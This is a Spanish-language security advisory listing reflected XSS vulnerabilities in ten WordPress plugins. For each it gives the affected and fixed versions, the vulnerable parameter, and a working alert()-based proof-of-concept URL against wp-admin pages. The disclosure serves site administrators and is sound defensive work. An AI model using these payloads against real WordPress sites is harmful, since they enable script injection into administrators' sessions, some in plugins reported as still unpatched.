El investigador de seguridad Tim Coen ha publicado múltiples vulnerabilidades en hasta 11 pluginsdiferentes para WordPress. Estas vulnerabilidades podrían permitir realizar ataques ‘Cross-site Scripting’(XSS) reflejados debido a la falta de filtrado antes de mostrar determinados parámetros con contenido proporcionado por el usuario.
A continuación se enumeran dichos plugins, las versiones vulnerables y actualizadas, el parámetro causante del fallo de seguridad y una prueba de concepto para comprobar si la versión instalada se encuentra afectada:
Blog2Social
- Versión vulnerable: 5.0.2
- Versión actualizada: 5.0.3
- Parámetro ‘b2s_update_publish_date’
- PoC: http://[WP-BLOG]/wp-admin/admin.php?page=blog2social-ship&postId=70&b2s_action=1&b2s_update_publish_date='”;><img src=x onerror=alert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>
Contact Form Email 7.10.41
- Versión vulnerable: 1.2.65
- Versión actualizada: 1.2.66
- Parámetro ‘item’
- PoC: http://[WP-BLOG]/wp-admin/admin.php?page=cp_contactformtoemail&edit=1&cal=1&item='”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>
Font_Organizer
- Versión vulnerable: 2.1.1
- Versión actualizada: Este plugin no ha recibido ninguna actualización por el momento.
- Parámetro ‘manage_font_id’
- PoC: http://[WP-BLOG]/wp-admin/options-general.php?page=font-setting-admin&manage_font_id='”;><img src=x onerror=alert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>
Give
- Versión vulnerable: 2.3.0
- Versión actualizada: 2.3.1
- Varios parámetros como ‘csv’, ‘mode’, ‘create_user’ y ‘delete_csv’.
- PoC: http://[WP-BLOG]/wp-admin/edit.php?post_type=give_forms&page=give-tools&tab=import&importer-type=import_donations&step=3&mapto%5B0%5D=email&mapto%5B1%5D=first_name&mapto%5B2%5D=amount&mapto%5B3%5D=form_id&csv='”><img+src%3dx+onerror%3dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>
KingComposer
- Versión vulnerable: 2.7.6
- Versión actualizada: Los desarrolladores de este plugin no han dado ninguna respuesta sobre el estado de este error. Se recomienda actualizar a la última versión disponible (en estos momentos la 2.7.8).
- Parámetro ‘id’
- PoC: http://[WP-BLOG]/wp-admin/admin.php?page=kc-mapper&id=<%2Fscript><script>alert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)<%2Fscript>
NextScripts: Social Networks Auto-Poster
- Versión vulnerable: 4.2.7
- Versión actualizada: 4.2.8
- Parámetro ‘item’
- PoC: http://[WP-BLOG]/wp-admin/admin.php?page=nxssnap-reposter&action=edit&item=24′”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>
Quiz And Survey Master
- Versión vulnerable: 6.0.4
- Versión actualizada: Los desarrolladores de este plugin no han dado ninguna información sobre el estado de este error. Se recomienda actualizar a la última versión disponible (en estos momentos la 6.2.0).
- Parámetro ‘quiz_id’
- PoC: http://[WP-BLOG]/wp-admin/admin.php?page=mlw_quiz_results&quiz_id='”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>
wpGoogleMaps
- Versión vulnerable: 7.10.41
- Versión actualizada: 7.10.43
- Al hacer un eco de ‘PHP_SELF’ sin filtrado previo.
- PoC: http://[WP-BLOG]/wp-admin/admin.php/'”;><img src=x onerror=alert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>?page=wp-google-maps-menu&action=foo
WP Live Chat Support
- Versión vulnerable: 8.0.17
- Versión actualizada: 8.0.18
- Parámetro: ‘term’
- PoC: http://[WP-BLOG]/wp-admin/admin.php?page=wplivechat-menu-gdpr-page&term='”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>
YOP Poll
- Versión vulnerable: 6.0.2
- Versión actualizada: 6.0.3
- Parámetro: ‘poll_id’
- PoC: http://[WP-BLOG]/wp-admin/admin.php?page=yop-polls&action=view-votes&poll_id=1′”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>
Adicionalmente también ha publicado varios errores de seguridad en el plugin Forminator para WordPress, de los cuales ya hablamos hace unos días: “Vulnerabilidades en el plugin de WordPress Forminator“.
Se pueden descargar las versiones indicadas de los anteriores plugins desde la página web oficial de WorPress.
Fuente: Hispasec.com